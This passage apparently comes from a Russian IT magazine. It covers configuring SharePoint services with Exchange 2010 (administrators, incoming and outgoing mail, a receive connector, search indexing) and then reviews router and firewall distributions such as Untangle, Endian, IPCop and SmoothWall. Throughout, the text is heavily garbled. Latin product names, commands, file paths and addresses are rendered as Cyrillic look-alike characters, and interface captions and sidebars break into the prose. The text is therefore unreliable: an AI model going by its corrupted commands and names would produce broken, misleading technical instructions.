задач, которые следует выполнить сразу после установки. 
Щелкаем по имени задачи, чтобы получить более подроб- 
ную информацию, после выполнения помечаем ее как 
выполненную. На данном этапе неплохо задействовать еще 
одного администратора. Чтобы это сделать, переходим в 
«Операции» (Орегайопз) и в разделе «Настройки безопас- 
ности» (БесигПуСопЯ^игайоп) нажимаем ссылку «Об- 
новление группы администрато ра фермы» (Прсіаге Рапп 
Асітіпізітаііог'з Сгоир) . Теперь выбираем «Создать — 
Добавить пользователя» (Ыеуу — АскШзег) и вводим 
название учетной записи (сІотаіпХизег) с паролем. При 
этом учетная запись должна уже существовать в домене или 
локально. Для удобства можно воспользоваться кнопками 
«Проверить имена» и «Обзор». 

К слову, пользователи могут иметь одно из четырех разре- 
шений: Полный доступ. Проектирование (просмотр, добав- 
ление, удаление, настройка, обновление, утверждение). 
Участие (просмотр, добавление, удаление, обновление) и 
Чтение (только просмотр) . 



► ііб 
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Управление приложениями 



Центр администрирования > Операции > Параметры входящей электронной почты 

Настройка параметров входящей электронной почты 

Эта страница предназначена для изменения настройки электрофон почты на іряой сервере. Здесь можно включить пли отключить входящую электронную 
почту, указать параметры электронной почты и настроит* веб-службу управления списками рассыпки Моткой ЗЬвгвРоті, Сведения о включении и настройке 
входящей электронной почты, 



ОК 



Отмена 



Включение входящей электронной почты: 

Если этот параметр установлен, узлы ЗНагеРоть смогут 
принимать электронную почту и сохранять входящие 
сообщения в списках. Узлы , списки и группы 
необходимо будет настраивать в индивидуальном 
порядке с использованием их собственных адресов 
электронной почты, 

В автоматическом режиме все обязательные параметры 
задаются автоматически. Расширений! режим 
необходим только в случае, когда для получения- 
входящей электронной Почты не используется Служба. 
5МТР, Е расширенном режиме потребуется указать 
папку доставки электронной почты. 



Служба управления каталогом 

Служба управления каталогом МмтмаЙ БНзпеРип* 
соединяет узлы ЗНагеРенп* с каталогом пользователей 
вашей организации, чтобы обеспечить расширенные 
возможности управления электронной почтой. Зга 
служба предоставляет поддержку для создания и 
управления группами рассылки электронной почты на 
узлах ЗНагеРоіп*, Кроме того, эта служба создает в этой 
каталоге контактные записи, которые позволяют 



Разрешить на узлах этого сервера получение электронной почты? 

Г да ^мет 
Режим задания параметров 
Г - автанатіпеоо^ 
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іктюльзовать службу управления каталогом ЗНагеРсмпІгдля создания групп рассылки и контактов? 
^ Нет 

г Де 

^ Удаленный доступ 
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НАСТРАИВАЕМ ВХОДЯЩУЮ ПОЧТУ В 5НАКЕР0ШТ 



Особенности 
установки М088 
в ѴѴіп2к8К2 

Сама по себе установка М088 в \Ѵіп2к8 сложнос- 
тей не вызывает, но в случае с \Ѵіп2к8К2 придется 
немного потрудиться. Проблема в том, что для К2 
нужна версия с интегрированным 5Р2, а на сайте М5 для 
закачки предлагается только 5Р1. Поэтому скачиваем 
М055 2007 5Р1 (при загрузке будут выданы ключи к триал 
версии), берем 5Р2 для ѴѴ55 3.0 и М055 (все х64, ссылки 
ищи в блоге Місгозоіт ЗЬагеРоіпі; Теат) и распаковываем 
файл установки М055 ОШсеЗегѵеп/ѵісІіЗРІ.ехе: 

> (ЖісеЗегѵег.ехе /ехсгасіттозз 

Теперь в каталоге тозз будут находиться все файлы. Уда- 
ляем все элементы каталога ІІрбасез (если он есть) и все, 
что связано с 5Р1. Теперь аналогичным образом распако- 
вываем ехе'шники с 5Р для ѴѴ55 и М055 и копируем файлы 
в каталог ЕГрсІаГез, кроме файла ѵѵзззеШр.сШ из 5Р2 ѴѴ55, 
который удаляем. Аналогично добавляем все доступные 
апдейты, копируя их поверх существующих файлов. 



Далее устанавливаем настройки исходящей электронной 
почты, ответственные за отправку оповещений, приглаше- 
ний и административных уведомлений. Нужно отметить, 
что эта установка не зависит от наличия компонента 
5МТР-5егѵег и ЕхсЬап^е. Может быть использован любой 
внешний 5МТР-сервер, также сам ЗЬагеРотс имеет воз- 
можность самостоятельной отправки почты. 

В самом простом случае достаточно отметить вариант 
автоматической настройки, ЗЬагеРоіпі; сам установит все 
параметры. В расширенном режиме уже можно указать 
большее количество настроек, в том числе и задать вне- 
шний 5МТР-сервер. Переходим в «Параметры исходящей 
электронной почты» (Ощ^оіп^ Е-таі1 Зетп^з) и заполняем 
поля: 5МТР-сервер исходящей почты, е-таіі отправителя 
и е-таіі для ответов. Здесь указываем данные нашего 
ЕхсЬап^е 2010, установленного ранее. Причем в качестве 
адреса исходящей почты можно указать несуществующий 
е-таіі, а вот ответный должен быть зарегистрирован. Оп- 
ционально указываем кодировку (по умолчанию ЦТР-8) . 
Да, и если что-то непонятно в настройках, практически на 
каждой странице имеется ссылка на пояснение. 

Вторым в списке заданий стоит настройка параметров вхо- 
дящей электронной почты. Это позволит ЗЬагеРоіпі: при- 
нимать и архивировать входящие сообщения, сохранять 
документы и делать отметку в календарях при поступлении 
приглашений. Здесь уже необходим компонент 5МТР- 
Зегѵег (если он не установлен, ЗЬагеРоіпі: предупредит об 




> СІѴСІ 

На прилагаемом 
кжурналу диске 
ты найдешь видеоро- 
лик, в котором пока- 
зано, какустановить 
и настроить ѴѴіпсІоѵѵз 
ЗЬагеРоіпІ Зегѵісез 
и ЕхсЬапде 2010 
в ѴѴіпсІоѵѵз 2008 П2. 
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• Основой ЗЬагеРоіпІ 
являютсятри различ- 
ные архитектуры: N5, 
.ІЧЕТ и5СИ5егѵег. 

• Подробно об 
Ехсбапде 2007 смотри 
в октябрьском номере 
тг за 2007 год. 
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УКАЗЫВАЕМ 5МТР-СЕРВЕР ДЛЯ ИСХОДЯЩЕЙ ПОЧТЫ 



этом) . Переходим в «Настройка параметров 
входящей электронной почты» и устанавлива- 
ем переключатель «Разрешить на узлах этого 
сервера получение электронной почты?» в 
положение «Да». Далее подключаем службу 
управления каталогом, что позволит соеди- 
нить узлы ЗЬагеРоіпі: с каталогом пользовате- 
лей организации. Указываем контейнер Асгіѵе 
БшесЮгу (ОП=имя_контейнера,ПС= домен), в 
котором будут создаваться новые группы рас- 
сылки, и данные нашего ЗМТР-сервера. Затем 
флажками устанавливаем параметры работы 
группы рассылки (прием сообщений только от 
пользователей, имеющих учетные записи, из- 
менение адреса и описания группы рассылки 
и т.д.) В частности, активация «Использовать 
службу управления каталогом ЗЬагеРоіпі: 
для создания групп рассылки и контактов?» 
позволит автоматически создавать контакт 
в Асгіѵе ИігесЮгу при активации поддержки 
почты для элемента ЗЬагеРоіпі:. Пользователям 
не придется запоминать кучу данных. В целях 
безопасности следует активировать флажок 
«Принимать сообщения только от пользо- 
вателей, имеющих учетные записи». Самой 
последней настройкой идет определение 
местоположения папки, где ЗЬагеРоіш будет 
искать входящую почту, принятую службой 
5МТР. В подсказке указан путь «с:\іпеі:рііЪ\ 
таіІгооЛсігор», который и прописываем в 
соответствующем поле. 



В М055 теперь можно активировать под- 
держку почты в библиотеке документов. 
Переходим к настройкам узла «Действия 
узла — Параметры узла» и выбираем 
«Библиотека документов: Параметры». 

В пункте «Обмен информацией» выбира- 
ем ссылку «Параметры входящей элек- 
тронной почты» (в ѴѴ55 такого пункта 
нет). Разрешаем получать электронную 
почту, установив флажок в самом верху 
страницы, и вводим электронный адрес, 
на который участники могут отсылать 
сообщения, принимаемые библиотекой. 
Остальные настройки позволят указать, 
как хранить сообщения и вложения к 
ним, разрешить прием сообщений от 
всех пользователей или в зависимости от 
установок библиотеки. Аналогично ак- 
тивируется работа с почтой для списков и 
компонента «Коллективное обсуждение». 
Далее необходимо сконфигурировать 
ЕхсЬап^е, чтобы он правильно направ- 
лял почту по адресам, прописанным в 
ЗЬагеРоіпі:. Для этого следует создать МХ-за- 
пись в ЕхсЬап^е 2010 для ЗЬагеРоіпі: и завес- 
ти/проверить почтовые ящики. Коннектор 
(соединитель отправки или соединитель 
получения) представляет собой логический 
шлюз в ЕхсЬап^е 2010, на который посту- 
пают входящие сообщения. Используя на 
этом этапе ЕхсЬап^е, мы получаем возмож- 



ность их фильтрации, проверки антиспам 
модулями и антивирусными программами. 
Сама суть операции в новой версии не изме- 
нилась. Коннектор создается при наличии 
роли «НИВ игапзрогі» или «Еб§е Тгашрогі» 
в ЕМС или ЗЬеІІ. В ЕМС переходим в «НиЪ 
Тгапзроп — Кесеіѵе Соппесиогз», затем 
выбираем в меню «Пеѵѵ Кесеіѵе СоппесШг». 
Появится визард, заполняем предложенные 
поля — название, домен, для которого будет 
обрабатываться почта (наш ЗЬагеРоіпі:), 
маршрутизация почты. В 5Ье11 вызываем 
командлет Пеѵѵ-КесеіѵеСоппесНог: 

Р3> Ыеѵг-КесеіѵеСоппесІіог -Ыате 
" Зупаск.ги Кесеіѵе СоппесРог" 

-ІІзаде ІпРегпаІ -КетоРеІрКапде 
192 . 168 . 30 . 1 - 192 . 168 . 30.5 

Все, теперь можно попробовать отправить 
сообщение по одному из адресов ЗЬагеРоіпі:. 

ЕЩЕ НЕМНОГО П0ЛЕЗНЫХУСТАН0В0К 

Далее разберем несколько полезных настроек, 
которые помогут быстрее настроить работу 
ЗЬагеРоіпі:. Так, еще одна важная задача — 
настройка службы индексирования (поиска) 
ѴѴ55. Для этого переходим в раздел «Топология 
и службы» (Торо1о§у апб Зегѵісез), выбира- 
ем ссылку «Службы на сервере» (Зегѵісез оп 
Зегѵег) и смотрим состояние «Поиск ѴѴіпсіоѵѵз 
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ПЕРВОСТЕПЕННЫЕ ЗАДАЧИ ПО НАСТРОЙКЕ 5НАКЕР0ШТ 



ЗЬагеРоіпі: Зегѵісез». Для ее настройки нажи- 
маем по имени. По умолчанию для запуска 
службы поиска и доступа к содержимому 
используется учетная запись центра админис- 
трирования. В целях безопасности следует 
завести отдельный аккаунт с правами «Чте- 
ние», который и указать в поле «Настраивае- 
мая — Имя пользователя». В самом низу окна 
расположены настройки индексирования. 

По умолчанию интервал составляет 5 минут, 
если контент меняется не часто, его нужно 
изменить в большую сторону, чтобы снизить 
нагрузку на сервер. По окончании настроек 
запускаем службу. 

Любой учетной записи, имеющейся в Асгіѵе 
Оігестгу, может быть предоставлен доступ 
к веб-узлу ЗЬагеРоіпі:. При этом каждый 
пользователь АБ уже имеет свой заполненный 
профиль — имя, отдел, компания, должность, 
электронная почта и так далее. Такие данные 
очень кстати на ЗЬагеРоіпі;, так как любой 
участник может воспользоваться поиском 
и найти нужного ему человека или инфор- 
мацию о нем. Поэтому, чтобы вручную не 
дублировать создание профиля, некоторые 
данные извлекаются из АБ и импортируются 
в базу ЗЬагеРоіпі:. Кстати, возможен импорт из 
любой ЬБАР базы данных. 

Кроме того, при отображении имени участ- 
ника выводится индикатор присутствия. Этот 
индикатор интегрирован со службой АБ, сер- 



вером ЕхсЬап^е и М5Ы Меззеп^ег. Администра- 
тор может управлять представлением данных 
о пользователях, а также их отображением в 
результатах поиска. 

ЗАКЛЮЧЕНИЕ Как ты понимаешь, это только 
начало, в статье затронут лишь небольшой 



фрагмент настроек, необходимых для пол- 
ноценной совместной работы ЗЬагеРоіпі; и 
ЕхсЬап^е Зегѵег. В дальнейшем тебе помогут 
документация проектов и личные экспери- 
менты, только так можно понять принцип 
взаимодействия этих достаточно мощных 
решений, т 
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■ ■ СЕРГЕЙ «ВВШОЕК» ЯРЕМЧУК 6&Ш0ЕК<©5ѴМАСК.Ки 



Сетевые 

регулировщики 

ОБЗОР ПОПУЛЯРНЫХ ДИСТРИБУТИВОВ-РОУТЕРОВ 

Среди разнообразия Ыпих-систем особенно выделяются специализи- 
рованные дистрибутивы-роутеры. Они, как правило, имеют небольшой 
размер, просты и понятны вустановке и настройке, а имеющиеся функ- 
ции позволяют подключить к интернету домашнюю/корпоративную сеть, 
защитив ее от сетевых атак и вирусов. У многих таких решений есть фун- 
кции контроля трафика, блокировки протоколов, антиспам-фильтр, шей- 
пер и многое другое, поэтому выбрать «своего защитника» достаточно 
непросто. Эта статья поможеттебе быстрее сориентироваться. 



иЫТАЫбІ-Е 6АТЕѴѴАѴ 7.0.1 

САЙТ ПРОЕКТА: ѵтѵѵ.ипіапдіе.сот 

ДАТА ВЫХОДА: 20 октября 2009 года 

ЛИЦЕНЗИЯ: ОРЬ 

АП П АРАТН Ы Е П Л АТФО РМ Ы : х86_32 
СИСТЕМНЫЕ ТРЕБОВАНИЯ: СРЦ 800 МГц, 

512 Мб РАМ, 20 Гб диск, 2+ N10 

Дистрибутив Ипііап^іе, выпускаемый 
одноименной компанией, способен 
заменить коммерческие решения вроде 
І5А Зегѵег (Рогеітопі: ТМС), обеспечивая 
безопасный доступ в интернет. Рассчи- 
тан Ипііап^іе на небольшие и средние 
организации, имеющие 50-300 и более 
компьютеров (системные требования 
приведены для 50) . Основой Ипііап^іе 
послужил ОеЫап, все настройки про- 
изводятся при помощи понятного, хотя 
и нелокализованного интерфейса. Для 
управления достаточно понимать суть, 
глубоких знаний ІІпіх-систем в обычной 
ситуации не потребуется. В отличие 
от других решений, использующих 
веб-технологии, интерфейс ІІпііап^Іе 
написан на Іаѵа, поэтому все измене- 
ния в консоли управления, статистика 
работы и так далее выводятся в реаль- 
ном времени, что очень удобно. Хотя за 
использование Эаѵа пришлось заплатить 
повышенными системными требовани- 
ями. 

ІІпііап^Іе выполнен в виде конструктора. 
После установки базовой системы в нем 
отсутствуют модули защиты, админист- 
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ратор самостоятельно выбирает то, что 
действительно необходимо, ориентиру- 
ясь по задачам и имеющемуся оборудо- 
ванию. В Шлап^іе можно добавить 94 
пакета (19 приложений), которые обес- 
печат: маршрутизацию, антивирусную/ 
антифишинг/зруѵѵаге защиту, обнаруже- 
ние атак, анализ протоколов (7 уровень), 
контентную фильтрацию веб-трафика, 
ѴРП-подключения и многие другие 
функции. В их основе лежат популярные 
ОрепЗоигсе-приложения: Зпогі:, СІатАѴ, 
ЗратАззаззіп, 5^шс1 и т.д. От ПоЗ'а и 
некоторых низкоуровневых сетевых атак 
защищает модуль собственной разработ- 
ки «Ашаск Віоскег», который предлагает- 
ся бесплатно. Антиспам-фильтр распоз- 
нает спам в изображениях, для чего он 
подключается к ОСИ. Модуль анализа 
протоколов при необходимости способен 
ограничить работу любых протоколов 
прикладного уровня (Р2Р, ІМ и т.п., всего 
— 100 протоколов), даже если они исполь- 
зуют нестандартные порты. 

По подписке распространяются некото- 
рые проприетарные разработки — ан- 
тивирус Касперского, е5оН ѴѴеЪ Еікег, 
модуль для работы с Асгіѵе Бкесгогу, 
резервирование настроек и т.д. Для 
удобства имеются и готовые «сборки» 
модулей, предназначенные для различ- 
ных сетей — Ебисапопз, 5та11 Визіпезз, 
Ргоіеззіопаі, Соѵегптепі: (в разных вари- 
антах поставки, распространяются также 



по подписке). Бесплатный модуль Керогаз 
позволяет админу получать отчеты по 
всем возможным ситуациям — сетевой 
активности, протоколам, обнаруженному 
спаму и вирусам, активности пользовате- 
лей. Результат можно сохранить в файлы 
форматов РОЕ, НТМБ, ХБ5, С5Ѵ и ХМБ и 
отправить по е-таіі. 

Установка дистрибутива достаточно 
проста и занимает минимум времени: 
традиционно следуем по подсказкам мас- 
тера (во время установки можно выбрать 
русский язык), отвечая на вопросы. По 
ходу будут проверены системные требо- 
вания, во всех позициях должно стоять 
ОК. Далее форматируем жесткий диск, 
процесс автоматизирован и достаточно 
нажать кнопку «Продолжить». 

После перезагрузки активируется мас- 
тер, задача которого — помочь в на- 
стройке шлюза. В списке предложенных 
языков понятен только английский, русс- 
кого здесь уже нет. Далее последователь- 
но набираем пароль для учетной записи 
абтіп, выбираем часовой пояс, вводим 
регистрационную информацию (обя- 
зательны е-таіі и количество компов). 
После этого система распознает сетевые 
карты и назначает их — Ехиегпаі/Іпнегпаі 
(при наличии третьего сетевого интер- 
фейса можно без особых проблем орга- 
низовать демилитаризованную зону) . 
Используя мышку, назначение можно 
поправить, только вот определить, 
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где какая из карт при имеющейся информации невозможно. 
Задаем тип интернет-подключения (ЗіаНс, ЭНСР, РРРоЕ), для 
проверки нажимаем «Тезгіп^ Соппесіііѵіііу». На шаге «Іпіегпаі 
Ыеіѵѵогк» потребуется выбрать один из двух вариантов приме- 
нения ІІпі;ап§1е: Тгапзрагепі; Вгісі^е или Коиіег. При выборе вто- 
рого варианта нужно указать ІР-адрес интерфейса внутренней 
сети и опционально активировать встроенный БНСР-сервер. И 
последний этап — отправка тестового сообщения на ящик ад- 
мина, по умолчанию используется внутренний 5МТР, но можно 
указать и любой внешний. По окончании загружается консоль 
управления. Слева две вкладки: в Арр$ выбираем и устанавли- 
ваем пакеты, в СопН§ — производим настройки. Все разбито 
по пунктам, поэтому найти нужные установки и разобраться 
будет весьма просто. Например, для настройки Еігеѵѵаіі пере- 
ходим в одноименную вкладку. Система сразу же предложит 
скачать требуемый пакет. Нажимаем «Егее Поѵѵпіоасі», по окон- 
чании загрузки в центре окна появится ярлык для настройки 
компонента. 

Аналогичным образом ставим все необходимое — Ашаск 
Віоскег, Ргоіосоі Сопігоі, ОрепѴРЫ, Керогіз и т.д. Для настройки 
модуля выбираем его и щелкаем по кнопке 5етп§. Например, 
в Рігеѵѵаіі уже имеются 3 подготовленных правила (блокировка 
входящих соединений на 21 порт; блокирующий и разрешаю- 
щий рулесеты для входящего трафика с сети 1 . 2 . 3 . 0 ) . Их можно 
взять за основу, отредактировав или создав свое правило по 
аналогии. Правило создается очень просто, нажимаем Асій и 
заполняем соответствующие поля. Здесь же в подвкладке «Рѵепі: 
Ію$» можно просмотреть связанные события. 

Если закрыть окно веб-клиента, перед нами появится рабо- 
чий стол. В панели несколько ярлыков, назначение которых 
носит больше вспомогательный характер — запуск и оста- 
новка скринсейвера, восстановление, изменение разреше- 
ния и т.п. 

ЕЫОІАЫ РІКЕѴѴАИСОММІІШТѴ 2.3 

САЙТ ПРОЕКТА: ѵѵѵт.епсііап.сот/еп/соттипііу/оѵегѵіеѵѵ 
ДАТА ВЫХОДА: 27 октября 2009 года 

ЛИЦЕНЗИЯ: ОРЬ 

АППАРАТНЫЕ ПЛАТФОРМЫ: х86_32 

СИСТЕМНЫЕ ТРЕБОВАНИЯ: СРІЛ 66 МГц, 64 Мб РАМ, 2 Гб 

Основой Епсііап Рігеѵѵаіі (ЕРѴѴ) изначально служил ІРСор 
Рігеѵѵаіі, в котором разработчики решили усилить функции 



безопасности и юзабилити интерфейса. Сегодня от родства уже 
мало что осталось, а ЕРѴѴ строится на базе СепЮЗ и включает 
полный набор средств защиты от внешних угроз, что позволяет 
относить его к ИТМ-системам (ІІпШесі ТЬгеаІ Мапа^етепі:, — 
смотри врезку). Это зіаіеіиі пакетный фильтр (пеНікег), Ш5/ 
ІР5 (на базе Зпогі:), фильтр контента, антивирусная проверка 
НТТР/РТР/РОРЗ/ЗМТР трафика, защита от спама, антиспуфинг 
и антифишинг модули. Политики фильтрации и маршрутиза- 
ции позволяют указать практически всю актуальную информа- 
цию — сетевой интерфейс, протокол, порт, ІР- и МАС-адреса. 
Предусмотрена возможность настройки АСЬ к сайтам через 
НТТР Ргоху (прозрачный или непрозрачный) с привязкой к 
пользователю, группе, по адресу, изега^епі:, времени. Контент- 
ный фильтр содержит готовые настройки для более чем 20 
категорий и подкатегорий. 

Подключение к интернету реализовано посредством ЕіЬегпеі, 
РРРоЕ, АЭЗЬ (ІІЗВ, РСІ), ІЗБЫ, модема, в том числе и ЗС. Внеш- 
нему интерфейсу можно назначить несколько ІР-адресов (ІР- 
алиасинг). Кроме локальной (ЫСЗА) аутентификации поль- 
зователей, предусмотрена поддержка Асііѵе БігесШгу, ЬЭАР и 
КАБШЗ. Добавим к этому списку создание и управление ѴЬАЫ, 
полноценное управление (^оЗ, поддержку ЗЫМР. В составе ЕРѴѴ 
находим два приложения для организации защищенного ѴРЫ- 
соединения — ОрепѴРЫ и Орепзѵѵап/РІиію (реализация ІРзес 
для Ілпих). 

Ведется статистика по соединениям, трафику, работе пользо- 
вателей. При наступлении определенных событий на е-таіі 
админа отправляется сообщение. 

Зашифрованный архив с настройками бэкапится на ИЗВ- 
флешку или засылается на е-таіі, так что при необходимости 
восстановить работу шлюза можно буквально за пару щелчков 
мышки. 

Управление системой предусмотрено из командной строки или 
через локализованный веб-интерфейс. 

Установка производится при помощи мастера с псевдографи- 
ческим интерфейсом и достаточно проста для неискушенного 
пользователя. Загружаемся и подтверждаем форматирование 
диска, после чего начнется копирование системы, по запросу 
указываем ІР-адрес СКЕБЫ (внутреннего) интерфейса. Вот и вся 
установка. После перезагрузки в консоль будут выведены дан- 
ные для регистрации через веб (Ьшр: //ір-адрес/ или 1ш:р5://ір- 
адрес: 10443 ) . Предлагаемое консольное меню позволяет выйти 
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5ѴМ/АСК 




•Основой ІРСор и 
Епсііап Рігеѵѵа И служил 
ЗтооіЬѴѴаЦ, но об 
их родстве сейчас 
врядли кто-нибудь 
догадается. 

•ВѴуайа использу- 
ются Сізсо-подобные 
команды. Хороший 
повод потрениро- 
ваться. 

•Ѵуайа сочетает в себе 
гибкость в настройках 
и надежность, прису- 
щие коммерческим 
решениям. 




> ѵѵагпіпд 

При установке любо- 
го описанного 
в статье дистрибути- 
ва данные на харде 
будут у н и чтоже н ы ! 




> сЫ 

В ролике на нашем 
0Ѵ0 мы покажем, как 
установить и нас- 
троить Епсііап 
Рігеѵѵа II Соттипііу, 
а затем познако- 
мимся с основными 
возможностями 
его интерфейса. Ты 
убедишься, насколь- 
ко этот дистрибутив 
прост в исполь- 
зовании. 




ИНТЕРФЕЙС ІІМТАІЧСІ.Е НАПИСАН НАМѴА, ОТСЮДА И ПРИЛИЧНЫЕ СИСТЕМНЫЕ ТРЕБО- 
ВАНИЯ 



в зЬеіі, установить пароль учетных записей гоог (для 
55Н) и асітіп (веб). Набрав в браузере предоставлен- 
ный адрес и пройдя несколько шагов, завершаем ус- 
тановку — выбираем язык (есть и русский), часовой 
пояс, соглашаемся с условиями лицензии СЫИ СРЬ. 
Далее мастер предлагает импортировать настройки 
из бэкапа, говорим «Нет» и указываем пароли для 
гоог и асітіп. 

Теперь настал черед «Мастера настройки сети», 
упрощающего процесс подключения к сети. С ним 
необходимо пройти 8 шагов, например, выбрать 
тип подключения КЕБ (внешнего) интерфейса и 
отметить, есть ли в наличии ѴѴіЕі (ВШЕ) и БМ2 
(ОКАНСЕ). При необходимости изменяем настрой- 
ки СКЕЕ11, присутствует возможность «переназна- 
чить» карту и указать алиасы, задать имя хоста. 
Аналогично повторяем эту операцию для других 
интерфейсов, вводим адреса основного и резер- 
вного БЫЗ-серверов, е-таіі админа. Все! После 
регистрации с учетными данными асітіп попа- 
даем на главную страницу консоли управления, 
где выводятся обновляемые в реальном времени 
графики по трафику, данные по состоянию служб и 
загрузке системы. Настроек достаточно много, но 
все они удачно распределены по группам, названия 
которых говорят сами за себя — Система, Статус, 
Компьютерная сеть, Службы, Межсетевой экран, 
Прокси, ѴРЫ и События. Справиться с дальнейшими 
настройками ЕЕѴѴ достаточно просто. 

ІРСОР РІКЕѴѴАІ.1. 1 .9.8 

САЙТ ПРОЕКТА: ѵѵѵт.ірсор.огд 



ДАТА ВЫХОДА: 29 октября 2009 года 

ЛИЦЕНЗИЯ: ОРЬ 

АППАРАТНЫЕ ПЛАТФОРМ Ы:х86_32 

СИСТЕМНЫЕ ТРЕБОВАНИЯ: Іпіеі Репііит II 233 МГц, 64 

Мб РАМ, 2 Гб 

Версия ІРСор 0.1.1 (2002 год) базировалась на 
ЗтоонііѴѴаІІ 0.9.9, затем проект полностью пе- 
решел на ЬЕЗ и сегодня о родстве уже мало, что 
говорит. Дистрибутив ориентирован на рынок 
50НО (5таіі ОШсе, Ноте ОШсе), поэтому основ- 
ная задача разработчиков — сделать интерфейс 
удобным и простым. В поставке имеется все не- 
обходимое для организации защищенного шлюза 
— фильтр пакетов, Ш5/ІР5, веб и БНЗ прокси, 
ОНСР-сервер/клиент, Орепзѵѵап, ОрепѴРШ огра- 
ничение трафика, МТР-сервер. Реализован конт- 
роль соединений через веб-прокси по ІР-адресам 
и имени системы. 

Все, чего не хватает в базовой поставке, доступно 
в аддонах ( ШпеЕ/аррзЛгас/ірсор/ѵѵікі/Асісіопз) , 

которые разрабатываются и поддерживаются, 
как правило, сторонними программистами. Здесь 
уже находим фильтр ІЖЬ, продвинутые настройки 
Іігеѵѵаіі, проверку веб и 5МТР-трафика на вирусы 
и многое другое. Как и в ЕЕѴѴ, интерфейсы имеют 
цвета — СКЕЕН, КЕБ, ОКА1МСЕ (БМ2) и т.д. Внешний 
интерфейс поддерживает подключение по ЕШегпеі: 
(статический, БНСР), РРТР, РРРоЕ, ІЗБМ, а также 
посредством модемного соединения. Некоторые 
операции (подключение, отключение, обновление и 
т.п.) можно выполнять по расписанию. 

До недавнего времени стабильной версией счита- 
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ТНЕ ВАО РАСКЕТ5 5ТОР НЕВЕ 




ОрепѴРГ-і 

Состояние Сеть Сервисы Файервол ВЧС Логи 




Боигсе 



Соединён (Скі ОН 13т 37к) 
21)09-11-11 10:49:12 

ІРСор ѵІ,9,Э ф 2001-2009 ТЬ« ІРСор Тот 




НАСТРОЙКИ 0РЕЫѴРЫ В ІРСОР РІКЕѴѴАЫ- ПРАКТИЧЕСКИ СВОДЯТСЯ К ЕГО АКТИВАЦИИ 



лась 1.4.20 (с обновлением до 1.4.21), сегодня активно разраба- 
тывается версия ІРСор ѵ2. С релизом 1.9.8 мы и познакомимся. 
Для загрузки доступны не только традиционные 150 (размер 50 
Мб), но и образы для сетевой загрузки, установки на ИЗВ-флеш- 
ку/хард и некоторые другие. 

Процесс установки производится в псевдографической консоли 
и весьма тривиален. По окончании набираем в браузере адрес 
Ьідр5://айпишник_шлюза:8443/. Для локализации интерфей- 
са следует перейти в Зузіет — СШ 5етп§ и выбрать в списке 
русский язык. 

Консоль управления достаточно проста. Вверху 7 вкладок 
(Система, Состояние, Сеть, Сервисы, Файервол, ВЧС, Логи), 
при наведении мышки на любую появляются подпункты. 
Например, чтобы настроить ОрепѴРМ, переходим в нужную 
вкладку, где, установив флажок «ОрепѴРЫ оп КЕБ», активируем 
сервер. Теперь указываем дополнительные параметры (ІР-ад- 
рес внешней и внутренней сети, протокол, алгоритм шифрова- 



ЦТМ-системы 

Сегодня интернет несет в себе не один десяток угроз — виру- 
сы, спам, фишинг, сетевые атаки, спуфинг и так далее. Очевидно, что 
системы с узкой специализацией (например, антивирусы) неспособны 
защитить сеть, это под силу только комплексному многофункциональ- 
ному решению, которое включает в себя все компоненты. Именно 
такой класс устройств, имеющий в своем составе брандмауэр, ГО5/ІР5, 
антивирус, прокси-сервер, контентный фильтр и антиспам модуль, и 
именуется ІГГМ. 

Сам термин ІГГМ (ШШеб ТЬгеаі Мапа^етепі, объединенный конт- 
роль угроз) введен Чарльзом Колодги из аналитической компании 
ГОС (Іпіегпагіопаі Баш Согрогагіоп) в документе «ѴѴогЫѵѵісІе ТЬгеаі: 
Мапа^ешепі: ЗесигЬуАррНапсез 2004-2008 Рогесазі апб 2003 Ѵепбог 
5Ьагез:ТЬе Кізе 01 іЬе ШШеб ТЬгеаі Мапа^етепі: Зесигііу АррНапсе», 
опубликованном в сентябре 2004 года. 
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ния, сжатие передаваемых данных с помощью библиотеки Ь2 О 
и т.п.) Переход по «Абѵапсесі Зегѵег Орііопз» позволит более 
тонко настроить работу ОрепѴРИ-сервера. Так же просто в 
«Файервол — Рігеѵѵаіі Кіііез» настраиваются правила пакетного 
фильтра. Выбираем тип правила (Оиі§оіп§ ТгаНіс, Перенаправ- 
ление портов, ІРСор Ассезз, Ехіегпаі ІРСор Ассезз) и заполняем 
предложенные поля. 

5М00ТНѴѴАІ.І. ЕХРРЕ55 3.0 5Р1 «Р01.АК» 

САЙТ ПРОЕКТА: 5тоо(ГіѵѵаІІ.огд 
ДАТА ВЫХОДА: 8 января 2009 года 

ЛИЦЕНЗИЯ: 6РЬ 

АП П АРАТН Ы Е П Л АТФ0 РМ Ы : х86_32 р х86_64 

СИСТЕМНЫЕ ТРЕБОВАНИЯ: Іпіеі Репііит 166 МГц, 32 Мб КАМ Р 2Гб 

то 



НАСТРОЙКИ ПРАВИЛ ПАКЕТНОГО ФИЛЬТРА 
В ЕЫйІАІЧ РІВЕѴѴАЫ. 



01 вчііит ЬгамчаІІ. 

ттг.: соттишіу 
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ЗУИ/АСК 




ОБНОВЛЯЕМЫЕ В РЕАЛЬНОМ 
ВРЕМЕНИ ГРАФИКИ ЗАГРУЗКИ 
КАНАЛОВ В 5М00ТНѴѴАЫ. 



Проект, возникший в середине 2000 
года, ставил перед собой цель превра- 
тить устаревший компьютер в полно- 
ценный шлюз с функциями защиты, с 
настройками которого мог бы спра- 
виться обычный пользователь. Начи- 
нание имело успех. За первые месяцы 
с 5оигсеЕог$е было скачано несколько 
десятков тысяч копий, хотя удобным 
веб-интерфейсом, ІБ5/ІР5 и некото- 
рыми другими полезными функциями 
5тоог1і\Уа11 обзавелся чуть позже (с вер- 
сии 0.9.9). В составе ЗтооііЬѴѴаІІ имеет- 
ся все необходимое — Нгеѵѵаіі, форвар- 
динг портов, поддержка ѴРЫ, ѴѴеЪ/БЫВ/ 
РОРЗ/5ІР прокси, ІМ-прокси (МЗИ/ 
АІМ/ІСО/УаЬоо) с готовыми фильтрами 
и журналированием трафика (на базе 
ІМ5ресГог), БНСР-сервер, ЫТР, подде- 
ржка (^о5. Возможна установка доступа 
выхода в интернет для определенных ад- 
ресов в зависимости от времени суток. 
При необходимости трафик проверяется 
при помощи антивируса Сіатаѵ. 

Как и в двух предыдущих дистрибутивах, 
поддерживается до 4 сетевых подключе- 
ний: \УАЫ, БАИ, БМ2, ѴѴіЕі. «Красный» 
интерфейс можно закрепить за: ЕгЬегпег 
(5іаііс, ОНСР), РРРоЕ, І5БЫ, АБ5Б или 
модемным соединением. 

Сам релиз 3.0 вышел в конце 2007 года, 
сегодня доступна свежая версия с 5Р1. 
Кроме 150 (х86, х86_64), на отдельной 
странице доступен образ ѴМѴѴаге. 
Установка достаточно проста, несколько 
